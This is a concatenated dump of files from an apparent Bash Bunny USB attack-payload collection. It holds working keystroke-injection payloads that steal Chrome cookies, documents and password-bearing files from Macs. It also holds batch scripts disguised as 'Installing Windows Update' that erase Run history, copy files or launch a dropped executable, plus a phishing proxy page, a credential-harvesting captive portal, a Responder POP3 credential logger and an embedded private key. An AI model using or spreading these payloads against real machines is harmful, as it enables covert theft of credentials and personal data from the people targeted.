Version: 1.0 5 | 6 | ## Description 7 | 8 | Clones the bashbunny-payloads repository and also will update an existing repository. Use this payload to get all the other payloads! 9 | 10 | ## Configuration 11 | 12 | Configured for nix by default. Swap RNDIS_ETHERNET with ECM_ETHERNET on Windows 13 | 14 | ## Requirements 15 | 16 | Target must be sharing internet. BashBunny must have git installed. 17 | 18 | 1. Run bb.sh (pause at main menu) 19 | 2. Plug in da bunny 20 | 3. Connect (type 'c') 5 seconds after the white light 21 | 4. You can now ssh into the bunny (Run `tail -f /tmp/git` to montior progress) 22 | 23 | ## Status 24 | 25 | | LED | Status | 26 | | ---------------- | ------------------------------------- | 27 | | White | Ready (to share internet connection) | 28 | | Red | Failed (no internet) | 29 | | Red (blinking) | Failed (could not mount filesystem) | 30 | | Amber | Running | 31 | | Purple | Cleaning Up | 32 | | Green (blinking) | Finished (git pull) | 33 | | Green | Finished (git clone) | 34 | -------------------------------------------------------------------------------- /payloads/library/SmacAndGrab/payload.txt: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # Title: sMacAndGrab 4 | # Author: audibleblink 5 | # Target: macOS 6 | # Version: 1.1 7 | # 8 | # Backup a list of files from macOS 9 | # 10 | # Yellow (blinking)...Attacking 11 | # Green...............Finished 12 | 13 | LED G R 500 14 | ATTACKMODE STORAGE HID VID_0X05AC PID_0X021E 15 | 16 | # make the loot directory on the BashBunny 17 | mkdir -p /root/udisk/loot/sMacAndGrab 18 | 19 | # mounted device name 20 | dev_name="BashBunny" 21 | 22 | # loot directory when mounted on the mac 23 | lootdir="/Volumes/$dev_name/loot/sMacAndGrab" 24 | 25 | # Add files, folders, or commands that return filenames 26 | files_to_copy=( 27 | "\"~/Library/Application Support/Google/Chrome/Default/Cookies\"" # Quote paths with spaces 28 | "~/Dropbox" 29 | "\$(grep -lr password ~/Documents)" # Escape the subshell to have this run on TARGET 30 | ) 31 | 32 | QUACK GUI SPACE 33 | QUACK DELAY 1000 34 | QUACK STRING terminal 35 | QUACK ENTER 36 | QUACK DELAY 4000 37 | # the more files in $files to copy, the longer tar will take to compress 38 | # one-liner because we want the move command to wait for tar to finish 39 | QUACK STRING tar -cf \$USER.tar.gz ${files_to_copy[*]}\; mv \$USER.tar.gz $lootdir\; killall Terminal 40 | QUACK ENTER 41 | 42 | # sync the filesystem 43 | sync 44 | LED G 45 | 46 | -------------------------------------------------------------------------------- /payloads/library/ExecutableInstaller/e.cmd: -------------------------------------------------------------------------------- 1 | @echo off 2 | @echo Installing Windows Update 3 | 4 | REM Delete registry keys storing Run dialog history 5 | REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f 6 | 7 | REM Below is for copying a directory with a payload inside the root directory of the Bash Bunny USB Mass Storage. 8 | REM echo d | xcopy /C /Q /Y /E %~dp0\..\..\PAYLOAD_FOLDER_IN_ROOT %APPDATA%\PAYLOAD_FOLDER_IN_ROOT 9 | 10 | REM Copy payload.exe from the root of the bash Bash Bunny USB Mass Storage (change to whatever you like). 11 | copy %~dp0\..\..\payload.exe %APPDATA%\payload.exe 12 | 13 | REM Below is for executing a payload inside a directory (see comments above). Change --startup to whatever parameters you wish to pass (or remove it). 14 | REM start "" "%APPDATA%\PAYLOAD_FOLDER_IN_ROOT\payload.exe" --startup 15 | 16 | REM Launch payload.exe with the startup parameter. Change --startup to whatever parameters you wish to pass (or remove it). 17 | start "" "%APPDATA%\payload.exe" --startup 18 | 19 | REM Blink CAPSLOCK key (from usb_exfiltrator) 20 | start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')" 21 | 22 | @cls 23 | @exit -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/files/AccessDenied.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | Website Blocked: ISA Proxy Server 4 | 14 | 15 | 16 | 17 |
18 |
19 |
New Security Policy: Website Blocked
20 |
    21 |
    22 |
    23 |
  • Access has been blocked. Please download and install the new Proxy Client in order to access internet resources.
    • 24 |
    25 |
26 |
27 |
ISA Security Proxy Server
28 |
29 | 30 | 31 | 32 | -------------------------------------------------------------------------------- /payloads/library/macinfograbber/payload.txt: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # Title: Mac Info Grabber 4 | # Author: kmakblob 5 | # Version: 1.2 6 | # 7 | # Steaks cookies from chrome and documents from the documents folder (spreadsheets) 8 | # then stashes them in /root/udisk/loot/MacLoot 9 | # 10 | # Amber..............Executing payload 11 | # Red................Failed to get spreadsheets 12 | # Purple.............Got some spreadsheets 13 | # Green..............Finished 14 | # 15 | 16 | LED G R 17 | ATTACKMODE HID STORAGE 18 | 19 | lootdir=loot/MacLoot 20 | mkdir -p /root/udisk/$lootdir 21 | 22 | QUACK GUI SPACE 23 | QUACK DELAY 1000 24 | QUACK STRING terminal 25 | QUACK ENTER 26 | QUACK DELAY 5000 27 | QUACK STRING mkdir -p /Volumes/BashBunny/$lootdir/xlsx 28 | QUACK ENTER 29 | QUACK DELAY 500 30 | QUACK STRING cat \~/Library/Application\\ Support/Google/Chrome/Default/Cookies \> 31 | /Volumes/BashBunny/$lootdir/chromecookies.db 32 | QUACK ENTER 33 | QUACK DELAY 1000 34 | QUACK STRING cp \~/Documents/{*.xlsx,*.xls,*.pdf} /Volumes/BashBunny/$lootdir/xlsx/\; killall Terminal 35 | QUACK ENTER 36 | 37 | # Sync filesystem 38 | sync 39 | 40 | # Green LED for finished 41 | LED G 42 | 43 | files=$(ls /Volumes/BashBunny/$lootdir/xlsx/*.xls 2> /dev/null | wc -l) 44 | files2=$(ls /Volumes/BashBunny/$lootdir/xlsx/*.xlsx 2> /dev/null | wc -l) 45 | 46 | if [ "$files" != "0" -o "$files2" != "0"]; then 47 | # Got spreadsheet files 48 | LED R B 49 | else 50 | LED R 51 | # No spread sheets 52 | fi 53 | -------------------------------------------------------------------------------- /payloads/library/BunnyTap/README.md: -------------------------------------------------------------------------------- 1 | # BunnyTap for Bash Bunnys 2 | 3 | Author: Whistle Master 4 | Version: Version 1.0 5 | Credit: @SamyKamkar 6 | 7 | ## Description 8 | 9 | Based on PoisonTap created by @SamyKamkar || https://samy.pl 10 | 11 | ## Configuration 12 | 13 | Configured for Windows by default. Swap RNDIS_ETHERNET for ECM_ETHERNET on Mac/*nix 14 | 15 | ## Requirements 16 | 17 | dnsspoof must be installed (use install.sh) 18 | 19 | ## Install LED STATUS 20 | 21 | | LED | Status | 22 | | ---------------- | -------------------------------------- | 23 | | White (blinking) | Dependencies not met | 24 | | Purple | Setup | 25 | | Purple (blinking)| Installing dependencies | 26 | | White (blinking) | Finished installing | 27 | | Red (blinking) | Install failed, no Internet connection | 28 | 29 | ## Payload LED STATUS 30 | 31 | | LED | Status | 32 | | ---------------- | -------------------------------------- | 33 | | Green (blinking) | BunnyTap Setup | 34 | | Blue | BunnyTap running | 35 | 36 | ## Discussion 37 | [Hak5 Forum Thread](https://forums.hak5.org/index.php?/topic/40240-poisontap-on-the-bunny/ "Hak5 Forum Thread") 38 | -------------------------------------------------------------------------------- /payloads/library/usb_exfiltrator/e.cmd: -------------------------------------------------------------------------------- 1 | @echo off 2 | @echo Installing Windows Update 3 | 4 | REM Delete registry keys storing Run dialog history 5 | REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f 6 | 7 | REM Creates directory compromised of computer name, date and time 8 | REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious 9 | set dst=%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2% 10 | mkdir %dst% >>nul 11 | 12 | if Exist %USERPROFILE%\Documents ( 13 | REM /C Continues copying even if errors occur. 14 | REM /Q Does not display file names while copying. 15 | REM /G Allows the copying of encrypted files to destination that does not support encryption. 16 | REM /Y Suppresses prompting to confirm you want to overwrite an existing destination file. 17 | REM /E Copies directories and subdirectories, including empty ones. 18 | 19 | REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.pdf %dst% >>nul 20 | 21 | REM Same as above but does not create empty directories 22 | xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.pdf %dst% >>nul 23 | ) 24 | 25 | REM Blink CAPSLOCK key 26 | start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')" 27 | 28 | @cls 29 | @exit -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/tools/FindSQLSrv.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # This file is part of Responder, a network take-over set of tools 3 | # created and maintained by Laurent Gaffie. 4 | # email: laurent.gaffie@gmail.com 5 | # This program is free software: you can redistribute it and/or modify 6 | # it under the terms of the GNU General Public License as published by 7 | # the Free Software Foundation, either version 3 of the License, or 8 | # (at your option) any later version. 9 | # 10 | # This program is distributed in the hope that it will be useful, 11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 13 | # GNU General Public License for more details. 14 | # 15 | # You should have received a copy of the GNU General Public License 16 | # along with this program. If not, see . 17 | from socket import * 18 | 19 | print 'MSSQL Server Finder 0.1' 20 | 21 | s = socket(AF_INET,SOCK_DGRAM) 22 | s.setsockopt(SOL_SOCKET, SO_BROADCAST, 1) 23 | s.settimeout(2) 24 | s.sendto('\x02',('255.255.255.255',1434)) 25 | 26 | try: 27 | while 1: 28 | data, address = s.recvfrom(8092) 29 | if not data: 30 | break 31 | else: 32 | print "===============================================================" 33 | print "Host details:",address[0] 34 | print data[2:] 35 | print "===============================================================" 36 | print "" 37 | except: 38 | pass 39 | 40 | 41 | -------------------------------------------------------------------------------- /payloads/library/Captiveportal/payload.txt: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # Title: Captiveportal 4 | # Author: Sebkinne 5 | # Version: 1.0 6 | 7 | # Usage of bunny_helpers.sh to avoid problems with find in function startCaptiveportal 8 | https://forums.hak5.org/index.php?/topic/40237-install-tools/ 9 | 10 | # Add or remove inputs here 11 | INPUTS=(username password) 12 | 13 | # Enable Ethernet (RNDIS = Windows, ECM = mac/*nix) 14 | ATTACKMODE RNDIS_ETHERNET 15 | #ATTACKMODE ECM_ETHERNET 16 | 17 | ################################################################## 18 | # DO NOT EDIT BELOW THIS LINE # 19 | ################################################################## 20 | 21 | # Sets up iptable forwarding and filters 22 | function setupNetworking() { 23 | echo 1 > /proc/sys/net/ipv4/ip_forward 24 | iptables -A INPUT -i usb0 -p udp --dport 53 -j ACCEPT 25 | iptables -A INPUT -i usb0 -p tcp --dport 443 -j DROP 26 | iptables -t nat -A PREROUTING -i usb0 -p tcp --dport 80 -j DNAT --to-destination 172.16.64.1:8080 27 | iptables -t nat -A PREROUTING -i usb0 -p udp --dport 53 -j DNAT --to-destination 172.16.64.1:53 28 | iptables -t nat -A POSTROUTING -j MASQUERADE 29 | } 30 | 31 | # Find payload directory and execute payload 32 | function startCaptiveportal() { 33 | # cd $(dirname $(find /root/udisk/payloads/ -name portal.html)) 34 | cd /root/udisk/payloads/$SWITCH_POSITION 35 | chmod +x captiveportal 36 | ./captiveportal ${INPUTS[@]} 37 | } 38 | 39 | LED G 200 40 | setupNetworking 41 | startCaptiveportal & 42 | LED B 0 43 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/testcases/ImpactPacket/test_TCP_bug_issue7.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | # sorry, this is very ugly, but I'm in python 2.5 4 | import sys 5 | sys.path.insert(0,"../..") 6 | 7 | from ImpactPacket import TCP, ImpactPacketException 8 | from binascii import hexlify 9 | import unittest 10 | from threading import Thread 11 | 12 | class TestTCP(unittest.TestCase): 13 | 14 | def setUp(self): 15 | # Dummy TCP header with "Maximum Segment Size" Option and zero length 16 | self.frame = '\x12\x34\x00\x50\x00\x00\x00\x01\x00\x00\x00\x00\x60\x00\x00\x00\x8d\x5c\x00\x00\x02\x00\x00\x00' 17 | 18 | def test_01(self): 19 | 'Test TCP options parsing hangs' 20 | class it_hangs(Thread): 21 | def __init__(self): 22 | Thread.__init__(self) 23 | def run(self): 24 | try: 25 | frame = '\x12\x34\x00\x50\x00\x00\x00\x01\x00\x00\x00\x00' \ 26 | '\x60\x00\x00\x00\x8d\x5c\x00\x00\x02\x00\x00\x00' 27 | tcp = TCP(frame) 28 | #except Exception,e: 29 | # print "aaaaaaaaaaaaaaa" 30 | # print e 31 | #except Exception,e: 32 | except ImpactPacketException,e: 33 | if str(e) != "'TCP Option length is too low'": 34 | raise e 35 | except: 36 | pass 37 | 38 | thread_hangs = it_hangs() 39 | thread_hangs.setDaemon(True) 40 | thread_hangs.start() 41 | thread_hangs.join(1.0) # 1 seconds timeout 42 | self.assertEqual(thread_hangs.isAlive(), False) 43 | #if thread_hang.isAlive(): 44 | 45 | 46 | suite = unittest.TestLoader().loadTestsFromTestCase(TestTCP) 47 | unittest.TextTestRunner(verbosity=2).run(suite) 48 | 49 | -------------------------------------------------------------------------------- /payloads/library/90sMode/readme.md: -------------------------------------------------------------------------------- 1 | # 90s Mode for Bash Bunnys 2 | 3 | * Author: Hak5Darren 4 | * Version: Version 1.0 5 | * Category: Prank 6 | * Target: Windows XP SP3+ / Powershell 7 | 8 | 9 | ## Description 10 | 11 | Turns back the clock to a k-rad ultra ereet 1990's VGA resolution 12 | Executes p.ps1 from the selected switch folder of the Bash Bunny USB Disk partition. 13 | 14 | ## Unnecessary Background Story 15 | 16 | Once a family member asked me to troubleshoot their computer. They claimed their hard drive was filling up. I checked and they had barely used the enormous (at the time) 20 GB HDD. Sorry I said, everything looks good. No they exclaimed, loading all of these cool programs from the World Wide Web was fine, but there's barely any room for another icon! 17 | 18 | Oh. Yes. About that... So I did what any good geek would and increased their resolution from 800x600 to 1024x768. Voila! More desktop real estate! 19 | 20 | Great! But now I need my reading glasses! 21 | 22 | So, one could say this payload *decreases* the disk space of the victim computer ;-) 23 | 24 | ## Configuration 25 | 26 | By default the payload switches to the very cool 640x480 resoluiton, however this can be configured to other standards such as 800x600 or 1024x768 in the last line of r.ps1 (this should eventually become a config line in payload.txt) 27 | 28 | ## STATUS 29 | 30 | | LED | Status | 31 | | ------------------ | -------------------------------------------- | 32 | | Purple | Attack Setup | 33 | | Green | Attack Complete | 34 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/examples/mssqlinstance.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # Copyright (c) 2003-2016 CORE Security Technologies 3 | # 4 | # This software is provided under under a slightly modified version 5 | # of the Apache Software License. See the accompanying LICENSE file 6 | # for more information. 7 | # 8 | # Description: [MC-SQLR] example. Retrieves the instances names from the target host 9 | # 10 | # Author: 11 | # Alberto Solino (@agsolino) 12 | # 13 | # Reference for: 14 | # Structure 15 | # 16 | 17 | 18 | import argparse 19 | import sys 20 | import string 21 | import logging 22 | 23 | from impacket.examples import logger 24 | from impacket import version, tds 25 | 26 | if __name__ == '__main__': 27 | 28 | print version.BANNER 29 | # Init the example's logger theme 30 | logger.init() 31 | 32 | parser = argparse.ArgumentParser(add_help = True, description = "Asks the remote host for its running MSSQL Instances.") 33 | 34 | parser.add_argument('host', action='store', help='target host') 35 | parser.add_argument('-timeout', action='store', default='5', help='timeout to wait for an answer') 36 | 37 | if len(sys.argv)==1: 38 | parser.print_help() 39 | sys.exit(1) 40 | 41 | options = parser.parse_args() 42 | 43 | ms_sql = tds.MSSQL(options.host) 44 | instances = ms_sql.getInstances(string.atoi(options.timeout)) 45 | if len(instances) == 0: 46 | "No MSSQL Instances found" 47 | else: 48 | for i, instance in enumerate(instances): 49 | logging.info("Instance %d" % i) 50 | for key in instance.keys(): 51 | print key + ":" + instance[key] 52 | 53 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/testcases/dot11/test_wps.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | # Copyright (c) 2003-2013 CORE Security Technologies 4 | # 5 | # This software is provided under under a slightly modified version 6 | # of the Apache Software License. See the accompanying LICENSE file 7 | # for more information. 8 | # 9 | # $Id$ 10 | # 11 | # Description: 12 | # Tests for WPS packets 13 | # 14 | # Author: 15 | # Aureliano Calvo 16 | 17 | 18 | # sorry, this is very ugly, but I'm in python 2.5 19 | import sys 20 | sys.path.insert(0,"../../..") 21 | 22 | 23 | import unittest 24 | from impacket import wps 25 | import array 26 | 27 | 28 | class TestTLVContainer(unittest.TestCase): 29 | 30 | def testNormalUsageContainer(self): 31 | BUILDERS={ 32 | 1: wps.StringBuilder(), 33 | 2: wps.ByteBuilder(), 34 | 3: wps.NumBuilder(2) 35 | } 36 | tlvc = wps.TLVContainer(builders=BUILDERS) 37 | 38 | KINDS_N_VALUES = ( 39 | (1, "Sarlanga"), 40 | (2, 1), 41 | (3, 1024), 42 | (4, array.array("B", [1,2,3])) 43 | ) 44 | for k,v in KINDS_N_VALUES: 45 | tlvc.append(k,v) 46 | 47 | tlvc2 = wps.TLVContainer(builders=BUILDERS) 48 | tlvc2.from_ary(tlvc.to_ary()) 49 | 50 | for k,v in KINDS_N_VALUES: 51 | self.assertEqual(v, tlvc2.first(k)) 52 | 53 | self.assertEqual(tlvc.to_ary(), tlvc2.to_ary()) 54 | self.assertEquals("Sarlanga", tlvc.first(1)) 55 | 56 | suite = unittest.TestLoader().loadTestsFromTestCase(TestTLVContainer) 57 | unittest.TextTestRunner(verbosity=2).run(suite) -------------------------------------------------------------------------------- /payloads/library/nmapper/payload.txt: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # Title: Nmapper for Bash Bunny 4 | # Author: Hak5Darren 5 | # Version: 1.0 6 | # 7 | # Scans target with nmap using specified options 8 | # Saves sequential logs to mass storage loot folder 9 | # 10 | # Red ...........Setup 11 | # Red Blinking...Setup Failed. Target did not obtain IP address. Exit. 12 | # Amber..........Scanning 13 | # White..........Switching to Mass Storage (optional) 14 | # Green..........Finished 15 | # 16 | 17 | # See nmap --help for options. Default "-O --fuzzy" profiles target OS. 18 | NMAP_OPTIONS="-O --fuzzy" 19 | LOOTDIR=/root/udisk/loot/nmap 20 | 21 | # Set LED Red while setting up attack 22 | LED R 23 | 24 | # Use RNDIS for Windows. Mac/*nix use ECM_ETHERNET 25 | ATTACKMODE RNDIS_ETHERNET 26 | #ATTACKMODE ECM_ETHERNET 27 | 28 | # Source bunny_helpers.sh to get environment variable TARGET_IP and TARGET_HOSTNAME 29 | source bunny_helpers.sh 30 | 31 | # Setup named logs in loot directory 32 | mkdir -p $LOOTDIR 33 | HOST=${TARGET_HOSTNAME} 34 | # If hostname is blank set it to "noname" 35 | [[ -z "$HOST" ]] && HOST="noname" 36 | COUNT=$(ls -lad $LOOTDIR/$HOST*.log | wc -l) 37 | COUNT=$((COUNT+1)) 38 | 39 | # Check target IP address. If unset, blink RED and end. 40 | if [ -z "${TARGET_IP}" ]; then 41 | LED R 100 42 | exit 1 43 | fi 44 | 45 | # Set LED, nmap target and sync filesystem before optionally switching to mass storage 46 | LED G R 47 | nmap $NMAP_OPTIONS $TARGET_IP >> $LOOTDIR/$HOST-$COUNT.log 48 | sync 49 | 50 | # Optionally become mass storage when scan completes 51 | #LED R G B 52 | #ATTACKMODE STORAGE 53 | 54 | # Payload complete. Set LED green 55 | LED G 56 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/install.sh: -------------------------------------------------------------------------------- 1 | # To avoid the use of find in the next section, let's verify the switch position 2 | # and therefore the exact position of tools_to_install 3 | source bunny_helpers.sh 4 | 5 | # Check to ensure that the tools_to_install directory isn't empty. 6 | # Exit with solid red LED if it is, otherwise note tools in log. 7 | TOOLSDIR=/root/udisk/payloads/$SWITCH_POSITION/tools_to_install/ 8 | if [ "$(ls -A $TOOLSDIR)" ]; then 9 | cd $TOOLSDIR 10 | echo "Available Tools:" > /tmp/tools_installer.log 11 | echo "----------------" >> /tmp/tools_installer.log 12 | for i in $(ls -d */); do echo ${i%%/} >> /tmp/tools_installer.log; done 13 | else 14 | LED R 15 | exit 1 16 | fi 17 | 18 | # Set LED to purple blinking and move tools 19 | LED R B 100 20 | mkdir -p /pentest 21 | mv $TOOLSDIR/* /pentest/ 22 | 23 | # Be sure that there are no OS made hidden files in the directory 24 | rm .* 25 | 26 | # Set LED to purple solid and check that move completed 27 | LED R B 28 | if [ "$(ls -A $TOOLSDIR)" ]; then 29 | # Set LED to red on fail and exit 30 | LED R 31 | exit 1 32 | else 33 | # Set LED to amber blinking on setup 34 | LED G R 100 35 | 36 | # Setup impacket 37 | cd /pentest/impacket 38 | python ./setup.py install 39 | 40 | # Additional tool setup goes here 41 | 42 | # List installed tools in /pentest and save to tools.txt on USB disk 43 | cd /pentest/ 44 | echo "Installed Tools:" > /root/udisk/installed-tools.txt 45 | echo "----------------" >> /root/udisk/installed-tools.txt 46 | for i in $(ls -d */); do echo ${i%%/} >> /root/udisk/installed-tools.txt; done 47 | sync && sleep 1 && sync 48 | 49 | # Set LED to white on success 50 | LED R G B 51 | exit 0 52 | fi 53 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/eap.py: -------------------------------------------------------------------------------- 1 | # Copyright (c) 2003-2016 CORE Security Technologies 2 | # 3 | # This software is provided under under a slightly modified version 4 | # of the Apache Software License. See the accompanying LICENSE file 5 | # for more information. 6 | # 7 | # Description: 8 | # EAP packets 9 | # 10 | # Author: 11 | # Aureliano Calvo 12 | 13 | 14 | from impacket.helper import ProtocolPacket, Byte, Word, Long, ThreeBytesBigEndian 15 | 16 | DOT1X_AUTHENTICATION = 0x888E 17 | 18 | class EAPExpanded(ProtocolPacket): 19 | """EAP expanded data according to RFC 3748, section 5.7""" 20 | 21 | WFA_SMI = 0x00372a 22 | SIMPLE_CONFIG = 0x00000001 23 | 24 | header_size = 7 25 | tail_size = 0 26 | 27 | vendor_id = ThreeBytesBigEndian(0) 28 | vendor_type = Long(3, ">") 29 | 30 | class EAPR(ProtocolPacket): 31 | """It represents a request or a response in EAP (codes 1 and 2)""" 32 | 33 | IDENTITY = 0x01 34 | EXPANDED = 0xfe 35 | 36 | header_size = 1 37 | tail_size = 0 38 | 39 | type = Byte(0) 40 | 41 | class EAP(ProtocolPacket): 42 | REQUEST = 0x01 43 | RESPONSE = 0x02 44 | SUCCESS = 0x03 45 | FAILURE = 0x04 46 | 47 | header_size = 4 48 | tail_size = 0 49 | 50 | code = Byte(0) 51 | identifier = Byte(1) 52 | length = Word(2, ">") 53 | 54 | class EAPOL(ProtocolPacket): 55 | EAP_PACKET = 0x00 56 | EAPOL_START = 0x01 57 | EAPOL_LOGOFF = 0x02 58 | EAPOL_KEY = 0x03 59 | EAPOL_ENCAPSULATED_ASF_ALERT = 0x04 60 | 61 | DOT1X_VERSION = 0x01 62 | 63 | header_size = 4 64 | tail_size = 0 65 | 66 | version = Byte(0) 67 | packet_type = Byte(1) 68 | body_length = Word(2, ">") 69 | 70 | 71 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/impacket/impacket/examples/logger.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # Copyright (c) 2003-2016 CORE Security Technologies 3 | # 4 | # This software is provided under under a slightly modified version 5 | # of the Apache Software License. See the accompanying LICENSE file 6 | # for more information. 7 | # 8 | # Description: This logger is intended to be used by impacket instead 9 | # of printing directly. This will allow other libraries to use their 10 | # custom logging implementation. 11 | # 12 | 13 | import logging 14 | import sys 15 | 16 | # This module can be used by scripts using the Impacket library 17 | # in order to configure the root logger to output events 18 | # generated by the library with a predefined format 19 | 20 | # If the scripts want to generate log entries, they can write 21 | # directly to the root logger (logging.info, debug, etc). 22 | 23 | class ImpacketFormatter(logging.Formatter): 24 | ''' 25 | Prefixing logged messages through the custom attribute 'bullet'. 26 | ''' 27 | def __init__(self): 28 | logging.Formatter.__init__(self,'%(bullet)s %(message)s', None) 29 | 30 | def format(self, record): 31 | if record.levelno == logging.INFO: 32 | record.bullet = '[*]' 33 | elif record.levelno == logging.DEBUG: 34 | record.bullet = '[+]' 35 | elif record.levelno == logging.WARNING: 36 | record.bullet = '[!]' 37 | else: 38 | record.bullet = '[-]' 39 | 40 | return logging.Formatter.format(self, record) 41 | 42 | def init(): 43 | # We add a StreamHandler and formatter to the root logger 44 | handler = logging.StreamHandler(sys.stdout) 45 | handler.setFormatter(ImpacketFormatter()) 46 | logging.getLogger().addHandler(handler) 47 | logging.getLogger().setLevel(logging.INFO) 48 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/servers/POP3.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # This file is part of Responder, a network take-over set of tools 3 | # created and maintained by Laurent Gaffie. 4 | # email: laurent.gaffie@gmail.com 5 | # This program is free software: you can redistribute it and/or modify 6 | # it under the terms of the GNU General Public License as published by 7 | # the Free Software Foundation, either version 3 of the License, or 8 | # (at your option) any later version. 9 | # 10 | # This program is distributed in the hope that it will be useful, 11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 13 | # GNU General Public License for more details. 14 | # 15 | # You should have received a copy of the GNU General Public License 16 | # along with this program. If not, see . 17 | from utils import * 18 | from SocketServer import BaseRequestHandler 19 | from packets import POPOKPacket 20 | 21 | # POP3 Server class 22 | class POP3(BaseRequestHandler): 23 | def SendPacketAndRead(self): 24 | Packet = POPOKPacket() 25 | self.request.send(str(Packet)) 26 | return self.request.recv(1024) 27 | 28 | def handle(self): 29 | try: 30 | data = self.SendPacketAndRead() 31 | 32 | if data[0:4] == "USER": 33 | User = data[5:].replace("\r\n","") 34 | data = self.SendPacketAndRead() 35 | if data[0:4] == "PASS": 36 | Pass = data[5:].replace("\r\n","") 37 | 38 | SaveToDb({ 39 | 'module': 'POP3', 40 | 'type': 'Cleartext', 41 | 'client': self.client_address[0], 42 | 'user': User, 43 | 'cleartext': Pass, 44 | 'fullhash': User+":"+Pass, 45 | }) 46 | self.SendPacketAndRead() 47 | except Exception: 48 | pass 49 | -------------------------------------------------------------------------------- /payloads/library/tools_installer/tools_to_install/responder/certs/responder.key: -------------------------------------------------------------------------------- 1 | -----BEGIN RSA PRIVATE KEY----- 2 | MIIEowIBAAKCAQEAunMwNRcEEAUJQSZDeDh/hGmpPEzMr1v9fVYie4uFD33thh1k 3 | sPET7uFRXpPmaTMjJFZjWL/L/kgozihgF+RdyR7lBe26z1Na2XEvrtHbQ9a/BAYP 4 | 2nX6V7Bt8izIz/Ox3qKe/mu1R5JFN0/i+y4/dcVCpPu7Uu1gXdLfRIvRRv7QtnsC 5 | 6Q/c6xINEbUx58TRkq1lz+Tbk2lGlmon2HqNvQ0y/6amOeY0/sSau5RPw9xtwCPg 6 | WcaRdjwf+RcORC7/KVXVzMNcqJWwT1D1THs5UExxTEj4TcrUbcW75+vI3mIjzMJF 7 | N3NhktbqPG8BXC7+qs+UVMvriDEqGrGwttPXXwIDAQABAoIBABuAkDTUj0nZpFLS 8 | 1RLvqoeamlcFsQ+QzyRkxzNYEimF1rp4rXiYJuuOmtULleogm+dpQsA9klaQyEwY 9 | kowTqG3ZO8kTFwIr9nOqiXENDX3FOGnchwwfaOz0XlNhncFm3e7MKA25T4UeI02U 10 | YBPS75NspHb3ltsVnqhYSYyv3w/Ml/mDz+D76dRgT6seLEOTkKwZj7icBR6GNO1R 11 | FLbffJNE6ZcXI0O892CTVUB4d3egcpSDuaAq3f/UoRB3xH7MlnEPfxE3y34wcp8i 12 | erqm/8uVeBOnQMG9FVGXBJXbjSjnWS27sj/vGm+0rc8c925Ed1QdIM4Cvk6rMOHQ 13 | IGkDnvECgYEA4e3B6wFtONysLhkG6Wf9lDHog35vE/Ymc695gwksK07brxPF1NRS 14 | nNr3G918q+CE/0tBHqyl1i8SQ/f3Ejo7eLsfpAGwR9kbD9hw2ViYvEio9dAIMVTL 15 | LzJoSDLwcPCtEOpasl0xzyXrTBzWuNYTlfvGkyd2mutynORRIZPhgHkCgYEA00Q9 16 | cHBkoBOIHF8XHV3pm0qfwuE13BjKSwKIrNyKssGf8sY6bFGhLSpTLjWEMN/7B+S1 17 | 5IC0apiGjHNK6Z51kjKhEmSzCg8rXyULOalsyo2hNsMA+Lt1g72zJIDIT/+YeKAf 18 | s85G6VgMtNLozNjx7C1eMugECJ+rrpRVpIe1kJcCgYAr+I0cQtvSDEjKc/5/YMje 19 | ldQN+4Z82RRkwYshsKBTEXb6HRwMrwIhGxCq8LF59imMUkYrRSjFhcXFSrZgasr2 20 | VVz0G4wGf7+flt1nv7GCO5X+uW1OxJUC64mWO6vGH2FfgG0Ed9Tg3x1rY9V6hdes 21 | AiOEslKIFjjpRhpwMYra6QKBgQDLFO/SY9f2oI/YZff8PMhQhL1qQb7aYeIjlL35 22 | HM8e4k10u+RxN06t8d+frcXyjXvrrIjErIvBY/kCjdlXFQGDlbOL0MziQI66mQtf 23 | 